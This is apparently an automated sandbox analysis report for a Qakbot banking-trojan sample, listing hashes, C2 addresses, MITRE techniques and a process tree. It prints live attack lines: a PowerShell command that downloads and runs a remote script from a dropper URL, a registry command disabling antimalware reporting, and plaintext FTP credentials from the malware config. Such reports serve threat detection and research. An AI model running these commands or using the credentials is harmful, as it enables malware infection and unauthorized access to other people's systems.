qakbot | 6f5d3879c4a516661a93499e64d7595333fb51d6a87677de25d9b7a19b41b362

General

Target

mpver.exe
Size

36.5MB
MD5

07a25e7f4f3a756e64c07c07d82591a4
SHA1

ff3f1f7e82d1721fa0d28cad127bca6d799f40b8
SHA256

6f5d3879c4a516661a93499e64d7595333fb51d6a87677de25d9b7a19b41b362
SHA512

efd1acbc61603c810b5048d5f71cfaddba3430ecf49e6a815f76b7ffa9fc48a91e1d371986199569bc15cd8051d0a67c24e8d6c6c3303ffcac0448395233b5d4

Score

10^/10

qakbot 1515090054 banker stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.allens-treasure-house.com/books_files/001.ps1

Extracted

Family

qakbot

Version

322.109

Campaign

1515090054

Credentials

Protocol: ftp
Host:
66.96.133.9
Port:
21
Username:
help
Password:
eT5TerAcnFe6~

Protocol: ftp
Host:
174.123.38.58
Port:
21
Username:
log@thebrainregistry.com
Password:
4BQ1MeeRAwNZEVu

Protocol: ftp
Host:
61.221.12.26
Port:
21
Username:
logger@ostergift.com
Password:
346HZGCMlwecz9S

Protocol: ftp
Host:
67.222.137.18
Port:
21
Username:
logger@grupocrepusculo.net
Password:
p4a8k6fE1FtA3pR

Protocol: ftp
Host:
107.6.152.61
Port:
21
Username:
logger@trussedup.com
Password:
RoP4Af0RKAAQ74V

C2

151.202.46.113:443

108.58.129.90:995

96.85.138.153:443

108.35.21.79:443

68.83.130.163:443

75.83.30.135:443

216.201.159.118:443

76.98.128.87:443

65.73.215.139:990

50.195.161.2:995

216.187.170.2:443

74.93.207.181:993

75.97.144.106:995

73.186.100.187:443

86.27.41.234:443

96.70.92.177:465

68.173.55.51:443

165.225.38.208:443

71.190.202.120:443

117.195.250.175:443

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

12 4084 powershell.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2168 4084 WerFault.exe powershell.exe

flow	pid	process
12	4084	powershell.exe

pid	pid_target	process	target process
2168	4084	WerFault.exe	powershell.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

mpver.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	mpver.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	mpver.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service	mpver.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	mpver.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	mpver.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service	mpver.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

Processes:

mpver.exempver.exepowershell.exeWerFault.exe

pid	process
3904	mpver.exe
3904	mpver.exe
4040	mpver.exe
4040	mpver.exe
4040	mpver.exe
4040	mpver.exe
4084	powershell.exe
4084	powershell.exe
4084	powershell.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe
2168	WerFault.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeWerFault.exe

description pid process

Token: SeDebugPrivilege 4084 powershell.exe
Token: SeDebugPrivilege 2168 WerFault.exe

description	pid	process
Token: SeDebugPrivilege	4084	powershell.exe
Token: SeDebugPrivilege	2168	WerFault.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

mpver.exe

description	pid	process	target process
PID 3904 wrote to memory of 4040	3904	mpver.exe	mpver.exe
PID 3904 wrote to memory of 4040	3904	mpver.exe	mpver.exe
PID 3904 wrote to memory of 4040	3904	mpver.exe	mpver.exe
PID 3904 wrote to memory of 3364	3904	mpver.exe	reg.exe
PID 3904 wrote to memory of 3364	3904	mpver.exe	reg.exe
PID 3904 wrote to memory of 4084	3904	mpver.exe	powershell.exe
PID 3904 wrote to memory of 4084	3904	mpver.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\mpver.exe
"C:\Users\Admin\AppData\Local\Temp\mpver.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3904

C:\Users\Admin\AppData\Local\Temp\mpver.exe
"C:\Users\Admin\AppData\Local\Temp\mpver.exe" /C
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4040

C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
2⤵
PID:3364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\gnnrhsjzilwzjqlfvytgevnba.txt'"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4084 -s 2484
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3364-121-0x0000000000000000-mapping.dmp

Download
memory/3904-114-0x0000000001000000-0x0000000001084000-memory.dmp

Filesize
528KB

Download
memory/3904-116-0x0000000000400000-0x00000000004AE000-memory.dmp

Filesize
696KB

Download
memory/4040-117-0x0000000000000000-mapping.dmp

Download
memory/4040-120-0x0000000000460000-0x0000000000466000-memory.dmp

Filesize
24KB

Download
memory/4084-122-0x0000000000000000-mapping.dmp

Download
memory/4084-128-0x00000261906A0000-0x00000261906A1000-memory.dmp

Filesize
4KB

Download
memory/4084-133-0x00000261A8D80000-0x00000261A8D82000-memory.dmp

Filesize
8KB

Download
memory/4084-134-0x00000261AAE60000-0x00000261AAE61000-memory.dmp

Filesize
4KB

Download
memory/4084-135-0x00000261A8D83000-0x00000261A8D85000-memory.dmp

Filesize
8KB

Download
memory/4084-140-0x00000261A8D86000-0x00000261A8D88000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads